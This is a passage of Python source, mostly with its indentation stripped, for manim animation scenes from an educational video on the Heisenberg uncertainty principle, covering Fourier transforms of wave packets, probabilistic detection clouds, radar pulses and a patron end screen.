frequency_axes.coords_to_point(1, 0.1),
color = YELLOW,
)
fourier_label = TextMobject("Fourier Transform")
fourier_label.next_to(arrow.get_center(), RIGHT)
self.play(ReplacementTransform(
self.axes.copy(), frequency_axes
))
self.play(
MoveToTarget(wave_copy, remover = True),
fourier_graph.restore,
GrowArrow(arrow),
Write(fourier_label, run_time = 1),
)
self.wait()
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
self.fourier_label = VGroup(arrow, fourier_label)
def show_correlations_with_pure_frequencies(self):
frequency_axes = self.frequency_axes
axes = self.axes
sinusoid = axes.get_graph(
lambda x : 0.5*np.cos(TAU*x),
x_min = -FRAME_X_RADIUS, x_max = 3*FRAME_X_RADIUS,
)
sinusoid.to_edge(UP, buff = SMALL_BUFF)
v_line = DashedLine(1.5*UP, ORIGIN, color = YELLOW)
v_line.move_to(frequency_axes.coords_to_point(1, 0), DOWN)
f_equals = TexMobject("f = ")
freq_decimal = DecimalNumber(1)
freq_decimal.next_to(f_equals, RIGHT, buff = SMALL_BUFF)
freq_label = VGroup(f_equals, freq_decimal)
freq_label.next_to(
v_line, UP, SMALL_BUFF,
submobject_to_align = f_equals[0]
)
self.play(
ShowCreation(sinusoid),
ShowCreation(v_line),
Write(freq_label, run_time = 1),
FadeOut(self.fourier_label)
)
last_f = 1
for f in 1.4, 0.7, 1:
self.play(
sinusoid.stretch,f/last_f, 0,
{"about_point" : axes.coords_to_point(0, 0)},
v_line.move_to, frequency_axes.coords_to_point(f, 0), DOWN,
MaintainPositionRelativeTo(freq_label, v_line),
ChangeDecimalToValue(freq_decimal, f),
run_time = 3,
)
last_f = f
self.play(*list(map(FadeOut, [
sinusoid, v_line, freq_label
])))
def this_is_momentum(self):
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"xi" : YELLOW,
})
formula.next_to(
self.frequency_x_axis_label, UP
)
f_max = 0.12
brace = Brace(Line(2*LEFT, 2*RIGHT), UP)
brace.move_to(self.frequency_axes.coords_to_point(1, f_max), DOWN)
words = TextMobject("This wave \\\\ describes momentum")
words.next_to(brace, UP)
self.play(Write(formula))
self.wait()
self.play(
GrowFromCenter(brace),
Write(words)
)
brace.add(words)
for k in 2, 0.5, 1:
self.play(
self.k_tracker.set_value, k,
self.wave_update_animation,
self.fourier_graph_update_animation,
UpdateFromFunc(
brace, lambda b : b.move_to(
self.frequency_axes.coords_to_point(
self.k_tracker.get_value(),
f_max,
),
DOWN
)
),
run_time = 2
)
self.wait()
self.play(*list(map(FadeOut, [brace, words, formula])))
def show_tradeoff(self):
for a in 5, 0.1, 0.01, 10, 0.5:
self.play(
ApplyMethod(
self.a_tracker.set_value, a,
run_time = 2
),
self.wave_update_animation,
self.fourier_graph_update_animation
)
self.wait()
##
def get_wave_func(self):
x0 = self.x0_tracker.get_value()
k = self.k_tracker.get_value()
a = self.a_tracker.get_value()
A = a**(0.25)
return lambda x : A*np.cos(TAU*k*x)*np.exp(-a*(x - x0)**2)
def get_wave(self, axes):
return axes.get_graph(
self.get_wave_func(),
color = self.wave_color,
stroke_width = self.wave_stroke_width
)
class DopplerComparisonTodos(TODOStub):
CONFIG = {
"message" : """
Insert some Doppler footage,
insert some hanging spring scene,
insert position-momentum Fourier trade-off
"""
}
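# A speaker plays a note while the scene traces out the corresponding
# signal: three cosine harmonics (frequencies 2, 3 and 5) under a Gaussian
# envelope, with a dashed line tracking the tip of the growing graph.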
class MusicalNote(AddingPureFrequencies):
def construct(self):
speaker = self.speaker = SVGMobject(file_name = "speaker")
speaker.move_to(2*DOWN)
randy = self.pi_creature
axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5
)
axes.center().to_edge(UP)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
graph = axes.get_graph(
lambda x : op.mul(
np.exp(-0.2*(x-4)**2),
0.3*(np.cos(2*TAU*x) + np.cos(3*TAU*x) + np.cos(5*TAU*x)),
),
)
graph.set_color(BLUE)
v_line = DashedLine(ORIGIN, 0.5*UP)
v_line_update = UpdateFromFunc(
v_line, lambda l : l.put_start_and_end_on_with_projection(
graph.points[-1],
axes.x_axis.number_to_point(
axes.x_axis.point_to_number(graph.points[-1])
)
)
)
self.add(speaker, axes)
self.play(
randy.change, "pondering",
self.get_broadcast_animation(n_circles = 6, run_time = 5),
self.get_broadcast_animation(n_circles = 12, run_time = 5),
ShowCreation(graph, run_time = 5, rate_func=linear),
v_line_update
)
self.wait(2)
class AskAboutUncertainty(TeacherStudentsScene):
def construct(self):
self.student_says(
"What does this have \\\\ to do with ``certainty''",
bubble_kwargs = {"direction" : LEFT},
student_index = 2
)
self.play(PiCreatureSays(
self.students[0],
"What even are \\\\ these waves?",
target_mode = "confused"
))
self.wait(2)
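# Models detection as sampling: the "particle" is a dot cloud drawn from a
# Gaussian whose spread tracks the wave packet's width, and a highlighted
# region reports Yes/No depending on whether the current sample lands inside
# it. Concentrating the wave (larger `a`) concentrates the detections.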
class ProbabalisticDetection(FourierTransformOfWaveFunction):
CONFIG = {
"wave_stroke_width" : 2,
}
def construct(self):
self.setup_wave()
self.detect_only_single_points()
self.show_probability_distribution()
self.show_concentration_of_the_wave()
def setup_wave(self):
axes = Axes(
x_min = 0, x_max = 10,
y_min = -0.5, y_max = 1.5,
y_axis_config = {
"unit_size" : 1.5,
"tick_frequency" : 0.25,
}
)
axes.set_stroke(width = 2)
axes.center()
self.x0_tracker.set_value(5)
self.k_tracker.set_value(1)
self.a_tracker.set_value(0.2)
wave = self.get_wave(axes)
self.wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.k_tracker.save_state()
self.k_tracker.set_value(0)
bell_curve = self.get_wave(axes)
self.k_tracker.restore()
bell_curve.set_stroke(width = 0)
bell_curve.set_fill(BLUE, opacity = 0.5)
squared_bell_curve = axes.get_graph(
lambda x : bell_curve.underlying_function(x)**2
).match_style(bell_curve)
self.set_variables_as_attrs(
axes, wave, bell_curve, squared_bell_curve
)
def detect_only_single_points(self):
particle = ProbabalisticDotCloud(
n_copies = 100,
fill_opacity = 0.05,
time_per_change = 0.05,
)
particle.mobject[0].set_fill(BLUE, opacity = 1)
gdw = particle.gaussian_distribution_wrapper
rect = Rectangle(
stroke_width = 0,
height = 0.5,
width = 2,
)
rect.set_fill(YELLOW, 0.3)
rect.move_to(self.axes.coords_to_point(self.x0_tracker.get_value(), 0))
brace = Brace(rect, UP, buff = 0)
question = TextMobject("Do we detect the particle \\\\ in this region?")
question.next_to(brace, UP)
question.add_background_rectangle()
rect.save_state()
rect.stretch(0, 0)
gdw_anim = Mobject.add_updater(
gdw, lambda m : m.set_width(
2.0/(self.a_tracker.get_value()**(0.5))
).move_to(rect)
)
self.add(rect, brace, question)
yes = TextMobject("Yes").set_color(GREEN)
no = TextMobject("No").set_color(RED)
for word in yes, no:
word.next_to(rect, DOWN)
# word.add_background_rectangle()
answer = VGroup()
def update_answer(answer):
px = particle.mobject[0].get_center()[0]
lx = rect.get_left()[0]
rx = rect.get_right()[0]
if lx < px < rx:
answer.submobjects = [yes]
else:
answer.submobjects = [no]
answer_anim = Mobject.add_updater(answer, update_answer)
self.add(gdw_anim, particle)
self.play(
GrowFromCenter(brace),
rect.restore,
Write(question)
)
self.wait()
self.add(answer_anim)
self.wait(4)
self.add_foreground_mobjects(answer, particle.mobject)
self.question_group = VGroup(question, brace)
self.particle = particle
self.rect = rect
def show_probability_distribution(self):
axes = self.axes
wave = self.wave
bell_curve = self.bell_curve
question_group = self.question_group
gdw = self.particle.gaussian_distribution_wrapper
rect = self.rect
v_lines = VGroup(*[
DashedLine(ORIGIN, 3*UP).move_to(point, DOWN)
for point in (rect.get_left(), rect.get_right())
])
self.play(
FadeIn(VGroup(axes, wave)),
question_group.next_to, v_lines, UP, {"buff" : 0},
*list(map(ShowCreation, v_lines))
)
self.wait(10)
def show_concentration_of_the_wave(self):
self.play(
self.a_tracker.set_value, 5,
self.wave_update_animation,
)
self.wait(10)
class HeisenbergCommentTodos(TODOStub):
CONFIG = {
"message" : "Insert position-momentum trade-off"
}
class HeisenbergPetPeeve(PiCreatureScene):
def construct(self):
morty, other = self.pi_creatures
particle = ProbabalisticDotCloud()
gdw = particle.gaussian_distribution_wrapper
gdw.to_edge(UP, buff = LARGE_BUFF)
gdw.stretch_to_fit_width(3)
gdw.rotate(3*DEGREES)
self.add(particle)
self.wait()
self.play(PiCreatureSays(
other, """
According to the H.U.P., the \\\\
universe is unknowable!
""",
target_mode = "speaking"
))
self.play(morty.change, "angry")
self.wait(3)
self.play(
PiCreatureSays(
morty, "Well, yes and no",
target_mode = "sassy",
),
RemovePiCreatureBubble(
other, target_mode = "erm"
)
)
self.wait(4)
###
def create_pi_creatures(self):
morty = Mortimer()
morty.to_corner(DOWN+RIGHT)
other = PiCreature(color = MAROON_E)
other.to_edge(DOWN).shift(3*LEFT)
return VGroup(morty, other)
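# The jittering "Randomness" label starts attached to Heisenberg's
# uncertainty principle, then migrates down to the layer it actually comes
# from: the interpretation of the wave function.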
class OneLevelDeeper(Scene):
def construct(self):
heisenberg = ImageMobject("Heisenberg")
heisenberg.to_corner(UP+LEFT)
self.add(heisenberg)
hup_words = TextMobject("Heisenberg's uncertainty principle")
wave_words = TextMobject("Interpretation of the wave function")
arrow = Vector(UP)
group = VGroup(hup_words, arrow, wave_words)
group.arrange(DOWN)
randomness = ProbabalisticMobjectCloud(
TextMobject("Randomness"),
n_copies = 5,
time_per_change = 0.05
)
gdw = randomness.gaussian_distribution_wrapper
gdw.rotate(TAU/4)
gdw.set_height(1)
# gdw.set_width(4)
gdw.next_to(hup_words, UP, MED_LARGE_BUFF)
self.add(hup_words, randomness)
self.wait(4)
self.play(
FadeIn(wave_words),
GrowArrow(arrow),
ApplyMethod(
gdw.next_to, wave_words, DOWN, MED_LARGE_BUFF,
path_arc = TAU/2,
)
)
self.wait(6)
class BetterTranslation(TeacherStudentsScene):
def construct(self):
english_term = TextMobject("Uncertainty principle")
german_word = TextMobject("Unschärferelation")
translation = TextMobject("Unsharpness relation")
to_german_words = TextMobject("In German")
to_german_words.scale(0.5)
to_german_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
to_german_words.next_to(to_german_arrow, RIGHT, SMALL_BUFF)
to_german_words.set_color(YELLOW)
to_german_group = VGroup(to_german_arrow, to_german_words)
translation_words = TextMobject("Literal translation")
translation_words.scale(0.5)
translation_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
translation_words.next_to(translation_arrow, LEFT, SMALL_BUFF)
translation_words.set_color(YELLOW)
translation_group = VGroup(translation_arrow, translation_words)
english_term.next_to(self.teacher, UP+LEFT)
english_term.save_state()
english_term.shift(DOWN)
english_term.fade(1)
self.play(
english_term.restore,
self.get_student_changes(*["pondering"]*3)
)
self.wait()
german_word.move_to(english_term)
to_german_group.next_to(
german_word, UP,
submobject_to_align = to_german_arrow
)
self.play(
self.teacher.change, "raise_right_hand",
english_term.next_to, to_german_arrow, UP
)
self.play(
GrowArrow(to_german_arrow),
FadeIn(to_german_words),
ReplacementTransform(
english_term.copy().fade(1),
german_word
)
)
self.wait(2)
group = VGroup(english_term, to_german_group, german_word)
translation.move_to(german_word)
translation_group.next_to(
german_word, UP,
submobject_to_align = translation_arrow
)
self.play(
group.next_to, translation_arrow, UP,
)
self.play(
GrowArrow(translation_arrow),
FadeIn(translation_words),
ReplacementTransform(
german_word.copy().fade(1),
translation
)
)
self.change_student_modes(*["happy"]*3)
self.wait(2)
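# Side-by-side dot cloud (position) and vector cloud (momentum) whose
# Gaussian spreads oscillate in anti-phase: as one distribution sharpens,
# the other widens. Ends by displaying the paired trade-offs
# (position <-> momentum) <=> (time <-> frequency).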
class ThinkOfHeisenbergUncertainty(PiCreatureScene):
def construct(self):
morty = self.pi_creature
morty.center().to_edge(DOWN).shift(LEFT)
dot_cloud = ProbabalisticDotCloud()
dot_gdw = dot_cloud.gaussian_distribution_wrapper
dot_gdw.set_width(1)
dot_gdw.rotate(TAU/8)
        dot_gdw.move_to(FRAME_X_RADIUS*RIGHT/2)
vector_cloud = ProbabalisticVectorCloud(
center_func = dot_gdw.get_center
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.set_width(0.1)
vector_gdw.rotate(TAU/8)
vector_gdw.next_to(dot_gdw, UP+LEFT, LARGE_BUFF)
time_tracker = ValueTracker(0)
freq = 1
continual_anims = [
always_shift(time_tracker, direction = RIGHT, rate = 1),
Mobject.add_updater(
dot_gdw,
lambda d : d.set_width(
(np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
Mobject.add_updater(
vector_gdw,
lambda d : d.set_width(
(-np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
dot_cloud, vector_cloud
]
self.add(*continual_anims)
position, momentum, time, frequency = list(map(TextMobject, [
"Position", "Momentum", "Time", "Frequency"
]))
VGroup(position, time).set_color(BLUE)
VGroup(momentum, frequency).set_color(YELLOW)
groups = VGroup()
for m1, m2 in (position, momentum), (time, frequency):
arrow = TexMobject("\\updownarrow").scale(1.5)
group = VGroup(m1, arrow, m2)
group.arrange(DOWN)
lp, rp = parens = TexMobject("\\big(\\big)")
parens.stretch(1.5, 1)
parens.match_height(group)
lp.next_to(group, LEFT, buff = SMALL_BUFF)
rp.next_to(group, RIGHT, buff = SMALL_BUFF)
group.add(parens)
groups.add(group)
arrow = TexMobject("\\Leftrightarrow").scale(2)
groups.submobjects.insert(1, arrow)
groups.arrange(RIGHT)
groups.next_to(morty, UP+RIGHT, LARGE_BUFF)
groups.shift_onto_screen()
self.play(PiCreatureBubbleIntroduction(
morty, "Heisenberg \\\\ uncertainty \\\\ principle",
bubble_class = ThoughtBubble,
bubble_kwargs = {"height" : 4, "width" : 4, "direction" : RIGHT},
target_mode = "pondering"
))
self.wait()
self.play(morty.change, "confused", dot_gdw)
self.wait(10)
self.play(
ApplyMethod(
VGroup(dot_gdw, vector_gdw ).shift,
FRAME_X_RADIUS*RIGHT,
rate_func = running_start
)
)
self.remove(*continual_anims)
self.play(
morty.change, "raise_left_hand", groups,
FadeIn(
groups,
lag_ratio = 0.5,
run_time = 3,
)
)
self.wait(2)
# End things
class PatreonMention(PatreonThanks):
def construct(self):
morty = Mortimer()
morty.next_to(ORIGIN, DOWN)
patreon_logo = PatreonLogo()
patreon_logo.to_edge(UP)
thank_you = TextMobject("Thank you.")
thank_you.next_to(patreon_logo, DOWN)
self.play(
DrawBorderThenFill(patreon_logo),
morty.change, "gracious"
)
self.play(Write(thank_you))
self.wait(3)
class Promotion(PiCreatureScene):
CONFIG = {
"camera_class" : ThreeDCamera,
"seconds_to_blink" : 5,
}
def construct(self):
aops_logo = AoPSLogo()
aops_logo.next_to(self.pi_creature, UP+LEFT)
url = TextMobject(
"AoPS.com/", "3b1b",
arg_separator = ""
)
url.to_corner(UP+LEFT)
url_rect = Rectangle(color = BLUE)
url_rect.replace(
url.get_part_by_tex("3b1b"),
stretch = True
)
url_rect.stretch_in_place(1.1, dim = 1)
rect = Rectangle(height = 9, width = 16)
rect.set_height(4.5)
rect.next_to(url, DOWN)
rect.to_edge(LEFT)
rect.set_stroke(width = 0)
mathy = Mathematician()
mathy.flip()
mathy.to_corner(DOWN+RIGHT)
morty = self.pi_creature
morty.save_state()
book = ImageMobject("AoPS_volume_2")
book.set_height(2)
book.next_to(mathy, UP+LEFT).shift(MED_LARGE_BUFF*LEFT)
mathy.get_center = mathy.get_top
words = TextMobject("""
Interested in working for \\\\
one of my favorite math\\\\
education companies?
""", alignment = "")
words.to_edge(UP)
arrow = Arrow(
aops_logo.get_top(),
morty.get_top(),
path_arc = -0.4*TAU,
stroke_width = 5,
tip_length = 0.5,
)
arrow.tip.shift(SMALL_BUFF*DOWN)
self.add(words)
self.play(
self.pi_creature.change_mode, "raise_right_hand",
*[
DrawBorderThenFill(
submob,
run_time = 2,
rate_func = squish_rate_func(double_smooth, a, a+0.5)
)
for submob, a in zip(aops_logo, np.linspace(0, 0.5, len(aops_logo)))
]
)
self.play(
words.scale, 0.75,
words.next_to, url, DOWN, LARGE_BUFF,
words.shift_onto_screen,
Write(url),
)
self.wait(2)
self.play(
LaggedStartMap(
ApplyFunction, aops_logo,
lambda mob : (lambda m : m.shift(0.2*UP).set_color(YELLOW), mob),
rate_func = there_and_back,
run_time = 1,
),
morty.change, "thinking"
)
self.wait()
self.play(ShowCreation(arrow))
self.play(FadeOut(arrow))
self.wait()
# To teacher
self.play(
morty.change_mode, "plain",
morty.flip,
morty.scale, 0.7,
morty.next_to, mathy, LEFT, LARGE_BUFF,
morty.to_edge, DOWN,
FadeIn(mathy),
)
self.play(
PiCreatureSays(
mathy, "",
bubble_kwargs = {"width" : 5},
look_at_arg = morty.eyes,
),
morty.change, "happy",
aops_logo.shift, 1.5*UP + 0.5*RIGHT
)
self.play(Blink(mathy))
self.wait()
self.play(
RemovePiCreatureBubble(
mathy, target_mode = "raise_right_hand"
),
aops_logo.to_corner, UP+RIGHT,
aops_logo.shift, MED_SMALL_BUFF*DOWN,
GrowFromPoint(book, mathy.get_corner(UP+LEFT)),
)
self.play(morty.change, "pondering", book)
self.wait(3)
self.play(Blink(mathy))
self.wait()
self.play(
Animation(
BackgroundRectangle(book, fill_opacity = 1),
remover = True
),
FadeOut(book),
)
self.play(
FadeOut(words),
ShowCreation(rect),
morty.restore,
morty.change, "happy", rect,
FadeOut(mathy),
)
self.wait(10)
self.play(ShowCreation(url_rect))
self.play(
FadeOut(url_rect),
url.get_part_by_tex("3b1b").set_color, BLUE,
)
self.wait(15)
class PuzzleStatement(Scene):
def construct(self):
aops_logo = AoPSLogo()
url = TextMobject("AoPS.com/3b1b")
url.next_to(aops_logo, UP)
group = VGroup(aops_logo, url)
group.to_edge(UP)
self.add(group)
words = TextMobject("""
AoPS must choose one of 20 people to send to a
tug-of-war tournament. We don't care who we send,
as long as we don't send our weakest person. \\\\ \\\\
Each person has a different strength, but we don't know
those strengths. We get 10 intramural 10-on-10 matches
to determine who we send. Can we make sure we don't send
the weakest person?
""", alignment = "")
words.set_width(FRAME_WIDTH - 2)
words.next_to(group, DOWN, LARGE_BUFF)
self.play(LaggedStartMap(FadeIn, words, run_time = 5, lag_ratio = 0.2))
self.wait(2)
class UncertaintyEndScreen(PatreonEndScreen):
CONFIG = {
"specific_patrons" : [
"CrypticSwarm",
"Ali Yahya",
"Juan Benet",
"Markus Persson",
"Damion Kistler",
"Burt Humburg",
"Yu Jun",
"Dave Nicponski",
"Kaustuv DeBiswas",
"Joseph John Cox",
"Luc Ritchie",
"Achille Brighton",
"Rish Kundalia",
"Yana Chernobilsky",
"Shìmín Kuang",
"Mathew Bramson",
"Jerry Ling",
"Mustafa Mahdi",
"Meshal Alshammari",
"Mayank M. Mehrotra",
"Lukas Biewald",
"Robert Teed",
"Samantha D. Suplee",
"Mark Govea",
"John Haley",
"Julian Pulgarin",
"Jeff Linse",
"Cooper Jones",
"Desmos ",
"Boris Veselinovich",
"Ryan Dahl",
"Ripta Pasay",
"Eric Lavault",
"Randall Hunt",
"Andrew Busey",
"Mads Elvheim",
"Tianyu Ge",
"Awoo",
"Dr. David G. Stork",
"Linh Tran",
"Jason Hise",
"Bernd Sing",
"James H. Park",
"Ankalagon ",
"Mathias Jansson",
"David Clark",
"Ted Suzman",
"Eric Chow",
"Michael Gardner",
"David Kedmey",
"Jonathan Eppele",
"Clark Gaebel",
"Jordan Scales",
"Ryan Atallah",
"supershabam ",
"1stViewMaths",
"Jacob Magnuson",
"Chloe Zhou",
"Ross Garber",
"Thomas Tarler",
"Isak Hietala",
"Egor Gumenuk",
"Waleed Hamied",
"Oliver Steele",
"Yaw Etse",
"David B",
"Delton Ding",
"James Thornton",
"Felix Tripier",
"Arthur Zey",
"George Chiesa",
"Norton Wang",
"Kevin Le",
"Alexander Feldman",
"David MacCumber",
"Jacob Kohl",
"Frank Secilia",
"George John",
"Akash Kumar",
"Britt Selvitelle",
"Jonathan Wilson",
"Michael Kunze",
"Giovanni Filippi",
"Eric Younge",
"Prasant Jagannath",
"Andrejs olins",
"Cody Brocious",
],
}
class Thumbnail(Scene):
def construct(self):
uncertainty_principle = TextMobject("Uncertainty \\\\", "principle")
uncertainty_principle[1].shift(SMALL_BUFF*UP)
quantum = TextMobject("Quantum")
VGroup(uncertainty_principle, quantum).scale(2.5)
uncertainty_principle.to_edge(UP, MED_LARGE_BUFF)
quantum.to_edge(DOWN, MED_LARGE_BUFF)
arrow = TexMobject("\\Downarrow")
arrow.scale(4)
arrow.move_to(Line(
uncertainty_principle.get_bottom(),
quantum.get_top(),
))
cross = Cross(arrow)
cross.set_stroke(RED, 20)
is_word, not_word = is_not = TextMobject("is", "\\emph{NOT}")
is_not.scale(3)
is_word.move_to(arrow)
# is_word.shift(0.6*UP)
not_word.set_color(RED)
not_word.set_stroke(RED, 3)
not_word.rotate(10*DEGREES, about_edge = DOWN+LEFT)
not_word.next_to(is_word, DOWN, 0.1*SMALL_BUFF)
dot_cloud = ProbabalisticDotCloud(
n_copies = 1000,
)
dot_gdw = dot_cloud.gaussian_distribution_wrapper
# dot_gdw.rotate(3*DEGREES)
dot_gdw.rotate(25*DEGREES)
# dot_gdw.scale(2)
dot_gdw.scale(2)
# dot_gdw.move_to(quantum.get_bottom()+SMALL_BUFF*DOWN)
dot_gdw.move_to(quantum)
def get_func(a):
return lambda t : 0.5*np.exp(-a*t**2)*np.cos(TAU*t)
axes = Axes(
x_min = -6, x_max = 6,
x_axis_config = {"unit_size" : 0.25}
)
graphs = VGroup(*[
axes.get_graph(get_func(a))
for a in (10, 3, 1, 0.3, 0.1,)
])
graphs.arrange(DOWN, buff = 0.6)
graphs.to_corner(UP+LEFT)
graphs.set_color_by_gradient(BLUE_B, BLUE_D)
frequency_axes = Axes(
x_min = 0, x_max = 2,
x_axis_config = {"unit_size" : 1}
)
fourier_graphs = VGroup(*[
get_fourier_graph(
frequency_axes, graph.underlying_function,
t_min = -10, t_max = 10,
)
for graph in graphs
])
for graph, fourier_graph in zip(graphs, fourier_graphs):
fourier_graph.pointwise_become_partial(fourier_graph, 0.02, 0.06)
fourier_graph.scale(3)
fourier_graph.stretch(3, 1)
fourier_graph.move_to(graph)
fourier_graph.to_edge(RIGHT)
self.add(graphs, fourier_graphs)
self.add(dot_cloud)
self.add(
uncertainty_principle, quantum,
)
self.add(arrow, cross)
# self.add(is_word)
# self.add(is_not)
import scipy
from manimlib.imports import *
from from_3b1b.old.fourier import *
import warnings
warnings.warn("""
Warning: This file makes use of
ContinualAnimation, which has since
been deprecated
""")
FREQUENCY_COLOR = RED
USE_ALMOST_FOURIER_BY_DEFAULT = False
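# An invisible Line whose endpoints encode mu - sigma and mu + sigma, so its
# center is the mean and its width is 2*sigma; the probabilistic clouds
# below sample from it coordinate-wise. A minimal usage sketch (inside a
# scene; names here are illustrative):
#
#   gdw = GaussianDistributionWrapper(mu = ORIGIN, sigma = 0.5*RIGHT)
#   samples = gdw.get_random_points(size = 10)  # 10 draws, ~N(mu_i, sigma_i) per coordinate
#   gdw.change_parameters(sigma = 2*RIGHT)      # widen the distribution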
class GaussianDistributionWrapper(Line):
CONFIG = {
"stroke_width" : 0,
"mu" : ORIGIN,
"sigma" : RIGHT,
}
def __init__(self, **kwargs):
Line.__init__(self, ORIGIN, RIGHT, **kwargs)
self.change_parameters(self.mu, self.sigma)
def change_parameters(self, mu = None, sigma = None):
curr_mu, curr_sigma = self.get_parameters()
mu = mu if mu is not None else curr_mu
sigma = sigma if sigma is not None else curr_sigma
self.put_start_and_end_on(mu - sigma, mu + sigma)
return self
def get_parameters(self):
center, end = self.get_center(), self.get_end()
return center, end-center
def get_random_points(self, size = 1):
mu, sigma = self.get_parameters()
return np.array([
np.array([
np.random.normal(mu_coord, sigma_coord)
for mu_coord, sigma_coord in zip(mu, sigma)
])
for x in range(size)
])
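# ContinualAnimation that scatters n_copies translucent copies of a
# prototype mobject, re-sampling every copy's position from the wrapper's
# Gaussian once per time_per_change seconds. Subclasses override
# update_mobject_by_point to decide how a sampled point is applied
# (e.g. as a vector tip in ProbabalisticVectorCloud below).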
class ProbabalisticMobjectCloud(ContinualAnimation):
CONFIG = {
"fill_opacity" : 0.25,
"n_copies" : 100,
"gaussian_distribution_wrapper_config" : {},
"time_per_change" : 1./60,
"start_up_time" : 0,
}
def __init__(self, prototype, **kwargs):
digest_config(self, kwargs)
fill_opacity = self.fill_opacity or prototype.get_fill_opacity()
if "mu" not in self.gaussian_distribution_wrapper_config:
self.gaussian_distribution_wrapper_config["mu"] = prototype.get_center()
self.gaussian_distribution_wrapper = GaussianDistributionWrapper(
**self.gaussian_distribution_wrapper_config
)
self.time_since_last_change = np.inf
group = VGroup(*[
prototype.copy().set_fill(opacity = fill_opacity)
for x in range(self.n_copies)
])
ContinualAnimation.__init__(self, group, **kwargs)
self.update_mobject(0)
def update_mobject(self, dt):
self.time_since_last_change += dt
if self.time_since_last_change < self.time_per_change:
return
self.time_since_last_change = 0
group = self.mobject
points = self.gaussian_distribution_wrapper.get_random_points(len(group))
for mob, point in zip(group, points):
self.update_mobject_by_point(mob, point)
return self
def update_mobject_by_point(self, mobject, point):
mobject.move_to(point)
return self
class ProbabalisticDotCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : BLUE,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
dot = Dot(color = self.color)
ProbabalisticMobjectCloud.__init__(self, dot)
class ProbabalisticVectorCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : RED,
"n_copies" : 20,
"fill_opacity" : 0.5,
"center_func" : lambda : ORIGIN,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
vector = Vector(
RIGHT, color = self.color,
max_tip_length_to_length_ratio = 1,
)
ProbabalisticMobjectCloud.__init__(self, vector)
def update_mobject_by_point(self, vector, point):
vector.put_start_and_end_on(
self.center_func(),
point
)
class RadarDish(SVGMobject):
CONFIG = {
"file_name" : "radar_dish",
"fill_color" : LIGHT_GREY,
"stroke_color" : WHITE,
"stroke_width" : 1,
"height" : 1,
}
class Plane(SVGMobject):
CONFIG = {
"file_name" : "plane",
"color" : LIGHT_GREY,
"height" : 1,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.rotate(-TAU/4)
class FalconHeavy(SVGMobject):
CONFIG = {
"file_name" : "falcon_heavy",
"color" : WHITE,
"logo_color" : BLUE_E,
"height" : 1.5,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.logo = self[-9:]
self.logo.set_color(self.logo_color)
class RadarPulseSingleton(ContinualAnimation):
CONFIG = {
"speed" : 3.0,
"direction" : RIGHT,
"start_up_time" : 0,
"fade_in_time" : 0.5,
"color" : WHITE,
"stroke_width" : 3,
}
def __init__(self, radar_dish, target, **kwargs):
digest_config(self, kwargs)
self.direction = self.direction/get_norm(self.direction)
self.radar_dish = radar_dish
self.target = target
self.reflection_distance = None
self.arc = Arc(
start_angle = -30*DEGREES,
angle = 60*DEGREES,
)
self.arc.set_height(0.75*radar_dish.get_height())
self.arc.move_to(radar_dish, UP+RIGHT)
self.start_points = np.array(self.arc.points)
self.start_center = self.arc.get_center()
self.finished = False
ContinualAnimation.__init__(self, self.arc, **kwargs)
def update_mobject(self, dt):
arc = self.arc
total_distance = self.speed*self.internal_time
arc.points = np.array(self.start_points)
arc.shift(total_distance*self.direction)
if self.internal_time < self.fade_in_time:
alpha = np.clip(self.internal_time/self.fade_in_time, 0, 1)
arc.set_stroke(self.color, alpha*self.stroke_width)
if self.reflection_distance is None:
arc_point = arc.get_edge_center(self.direction)
target_point = self.target.get_edge_center(-self.direction)
arc_distance = np.dot(arc_point, self.direction)
target_distance = np.dot(target_point, self.direction)
if arc_distance > target_distance:
self.reflection_distance = target_distance
if self.reflection_distance is not None:
delta_distance = total_distance - self.reflection_distance
point_distances = np.dot(self.direction, arc.points.T)
diffs = point_distances - self.reflection_distance
shift_vals = np.outer(-2*np.maximum(diffs, 0), self.direction)
arc.points += shift_vals
#Check if done
arc_point = arc.get_edge_center(-self.direction)
if np.dot(arc_point, self.direction) < np.dot(self.start_center, self.direction):
self.finished = True
self.arc.fade(1)
def is_finished(self):
return self.finished
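# Bundles several RadarPulseSingletons with staggered internal clocks and a
# color gradient, so the pulse reads as a short wave train rather than a
# single arc; it is finished once every singleton has reflected and
# returned to the dish.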
class RadarPulse(ContinualAnimation):
CONFIG = {
"n_pulse_singletons" : 8,
"frequency" : 0.05,
"colors" : [BLUE, YELLOW]
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
colors = color_gradient(self.colors, self.n_pulse_singletons)
self.pulse_singletons = [
RadarPulseSingleton(*args, color = color, **kwargs)
for color in colors
]
        pulse_mobjects = VGroup(*[ps.mobject for ps in self.pulse_singletons])
        ContinualAnimation.__init__(self, pulse_mobjects, **kwargs)
def update_mobject(self, dt):
for i, ps in enumerate(self.pulse_singletons):
ps.internal_time = self.internal_time - i*self.frequency
ps.update_mobject(dt)
def is_finished(self):
return all([ps.is_finished() for ps in self.pulse_singletons])
class MultipleFlashes(Succession):
CONFIG = {
"run_time_per_flash" : 1.0,
"num_flashes" : 3,
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
kwargs["run_time"] = self.run_time_per_flash
Succession.__init__(self, *[
Flash(*args, **kwargs)
for x in range(self.num_flashes)
])
class TrafficLight(SVGMobject):
CONFIG = {
"file_name" : "traffic_light",
"height" : 0.7,
"post_height" : 2,
"post_width" : 0.05,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
post = Rectangle(
height = self.post_height,
width = self.post_width,
